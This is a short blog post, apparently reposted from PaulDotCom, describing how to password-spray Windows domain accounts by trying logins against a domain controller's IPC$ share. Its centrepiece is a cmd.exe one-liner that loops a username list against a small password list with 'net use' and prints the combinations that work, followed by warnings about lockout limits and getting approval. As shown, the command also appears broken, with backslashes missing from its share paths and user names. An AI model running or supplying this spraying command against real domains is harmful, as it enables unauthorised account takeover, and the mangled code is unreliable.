A while ago, Dave Hoelzer did a nice video on how to use Windows PowerShell to hack domain user accounts. Basically, Dave leveraged PowerShell commands which any domain user can execute on a domain and receive either a positive and negative response based on the legitimacy of the username and password combination. This got me thinking. Since I’m not typically handed, or able to spawn, a PowerShell right from the get go, what else could I use to accomplish the same goal? The answer is attempting to connect to the IPC$ share of a domain controller. Using the following command, you can spray a huge list of domain users with a small number of passwords (to avoid lockout) and try to catch someone using something simple.
@FOR /F %n in (names.txt) DO @FOR /F %p in (passwords.txt) DO @net use \DC01 /user:mydomain%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \DC01IPC$ > NUL
WARNING: Make sure the number of passwords in your file is less then that of the account lockout policy.
And the other obligatory warning – make sure you have approval from Corporate before trying this.
via PaulDotCom: Archives.